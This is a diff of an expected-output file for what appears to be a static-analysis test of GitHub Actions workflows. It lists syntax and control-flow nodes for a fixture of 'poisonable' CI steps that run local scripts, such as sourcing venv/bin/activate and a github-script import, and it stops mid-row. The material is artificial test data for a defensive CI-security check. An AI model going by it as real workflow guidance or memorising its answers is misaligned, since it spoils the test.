.github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -576,47 +588,49 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| 